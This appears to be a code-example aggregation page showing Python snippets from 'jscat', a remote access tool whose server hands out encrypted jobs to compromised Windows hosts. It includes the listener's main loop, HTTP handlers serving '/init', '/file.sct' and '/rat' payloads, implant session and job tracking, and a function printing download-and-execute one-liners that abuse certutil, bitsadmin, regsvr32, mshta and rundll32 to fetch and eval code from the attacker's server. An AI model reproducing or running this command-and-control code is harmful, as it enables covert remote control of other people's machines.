예제 #1
0
파일: jscat.py 프로젝트: rootklt/jscat 
def run(cmdArguments):
    # 获取当前使用的rc4加密key
    rc4_key = get_rc4_key(cmdArguments.get('new_key'))
    Log.log_message(
        '[*]server cipher key: {}'.format(BOLD(rc4_key)), log_type=Log.SERVER)
    cmdArguments['new_key'] = rc4_key
    # 启动http监听服务
    host = cmdArguments['host']
    port = int(cmdArguments['port'])

    httpd = Server(cmdArguments)
    httpd.start()

    Log.log_message(
        '[*]host connect ip is {}:{}...'.format(BOLD(host), BOLD(port)), log_type=Log.SERVER)

    print_online_cmd(host, port)

    # 控制台命令输入
    try:
        while True:
            if not httpd.shell.get_command():
                httpd.shutdown()
                exit()
    except KeyboardInterrupt:
        httpd.shutdown()
        Log.log_message('server shutdown', log_type=Log.SERVER)
예제 #2
0
def run(ip, port, new_key, sleep_time):
    # 获取当前使用的rc4加密key
    rc4_key = get_rc4_key(new_key)
    Log.log_message(
        '[*]server cipher key: {}'.format(BOLD(rc4_key)), log_type=Log.SERVER)
    # 启动http监听服务
    session = Session()
    shell = Shell(session)
    httpd = Server(ip, port, JSCatServer, session, shell, rc4_key, sleep_time)
    httpd.start()
    Log.log_message(
        '[*]server running in  {}:{}...'.format(BOLD('0.0.0.0'), BOLD(port)), log_type=Log.SERVER)
    Log.log_message(
        '[*]host connect ip is {}:{}...'.format(BOLD(ip), BOLD(port)), log_type=Log.SERVER)

    print_online_cmd(ip, port)
    # 控制台命令输入
    try:
        while True:
            if not httpd.shell.get_command():
                httpd.shutdown()
                exit()
    except KeyboardInterrupt:
        httpd.shutdown()
        Log.log_message('server shutdown', log_type=Log.SERVER)
예제 #3
0
파일: jscat.py 프로젝트: Ddosser/jscat 
def print_online_cmd(host, port):
    print('[*]Execute in host:')
    print(
        '{} -urlcache -split -f http://{}:{}/init css.js && cscript //nologo css.js'
        .format(BOLD('certutil'), host, port))
    print('{} /transfer n http://{}:{}/init css.js && cscript //nologo css.js'.
          format(BOLD('bitsadmin'), host, port))
    print('{} /s /n /u /i:http://{}:{}/file.sct scrobj.dll'.format(
        BOLD('regsvr32'), host, port))
    print(
        '''{} javascript:eval("x=new ActiveXObject('WinHttp.WinHttpRequest.5.1');x.open('GET','http://{}:{}/init',false);x.send();eval(x.responseText)")(window.close())'''
        .format(BOLD('mshta'), host, port))
    print(
        '{} javascript:"\..\mshtml, RunHTMLApplication ";x=new%20ActiveXObject("Msxml2.ServerXMLHTTP.6.0");x.open("GET","http://{}:{}/init",false);x.send();eval(x.responseText);window.close();'
        .format(BOLD('rundll32'), host, port))
예제 #4
0
def run(ip, port, new_key, sleep_time):
    # 获取当前使用的rc4加密key
    rc4_key = get_rc4_key(new_key)
    print('[*]server encrypt key is {}'.format(BOLD(rc4_key)))
    # 启动http监听服务
    session = Session()
    shell = Shell(session)
    httpd = Server(ip, port, JSCatServer, session, shell, rc4_key, sleep_time)
    httpd.start()
    print('[*]server running in {}:{}...'.format(BOLD(ip), BOLD(port)))
    print_online_cmd(ip, port)
    # 控制台命令输入
    try:
        while True:
            if not httpd.shell.get_command():
                httpd.shutdown()
                exit()
    except KeyboardInterrupt:
        httpd.shutdown()
        print('server shutdown')
예제 #5
0
    def do_POST(self):
        context = b''
        # 检查session
        session_key = self.__check_cookie_session()
        # 如果cookie中不存在session值,设置session值,执行session初始化任务
        if not session_key:
            self.headers_to_send.append({
                'key':
                'Set-Cookie',
                'value':
                'session={}'.format(self.session.get_random_session_key())
            })
            context = self.session.load_init_job()
        else:
            content_len = int(self.headers['content-length'])
            post_body = self.rfile.read(content_len)
            job_id, job_context = self.__check_response(post_body)
            # 如果session已存在,更新session状态、检查任务返回信息
            if session_key in self.session.SESSIONS:
                self.session.update_session(session_key)
                if job_id:
                    print('\n[+]received client:{},SID/JOB:{}/{}, bytes {}'.
                          format(
                              BOLD(self.client_address[0]),
                              BOLD(self.session.SESSIONS[session_key]['id']),
                              BOLD(job_id), BOLD(content_len)))
                    self.session.check_job(session_key, job_id, job_context)
                # 获取待执行的一个任务:
                context = self.session.load_job(session_key)
            # 如果session未初始化,对返回job ID == 1的任务进行session初始化;否则重新执行初始化任务
            else:
                if job_id and job_id == 1:
                    print('\n[+]received {}, client:{},bytes {}'.format(
                        BOLD('SESSION INIT'), BOLD(self.client_address[0]),
                        BOLD(content_len)))
                    # JOB ID==1,表示这是session初始化任务
                    self.session.init_session(session_key,
                                              self.client_address[0],
                                              self.headers['User-Agent'],
                                              job_context)
                    # 获取待执行的一个任务:
                    context = self.session.load_job(session_key)
                else:
                    context = self.session.load_init_job()

        self.__to_reply(200, self.__encrypt_context(context))
예제 #6
0
    def do_GET(self):
        context = b''
        if self.path.startswith('/init'):
            context = Payload.init(self.server.host, self.server.port)
            print('\n[+]received {} client:{}'.format(
                BOLD('INIT'), BOLD(self.client_address[0])))
        elif self.path.startswith('/file.sct'):
            context = Payload.regsvr(self.server.host, self.server.port)
            print('\n[+]received {} client:{}'.format(
                BOLD("REGSVR32"), BOLD(self.client_address[0])))
        elif self.path == '/rat':
            context = Payload.rat(self.server.host, self.server.port,
                                  self.server.rc4_key, self.server.sleep_time)
            self.server.shell.prompt_msg = '{} >'.format(
                self.client_address[0])
            print('\n[+]received {} client:{}'.format(
                BOLD('RAT'), BOLD(self.client_address[0])))

        self.__to_reply(200, context)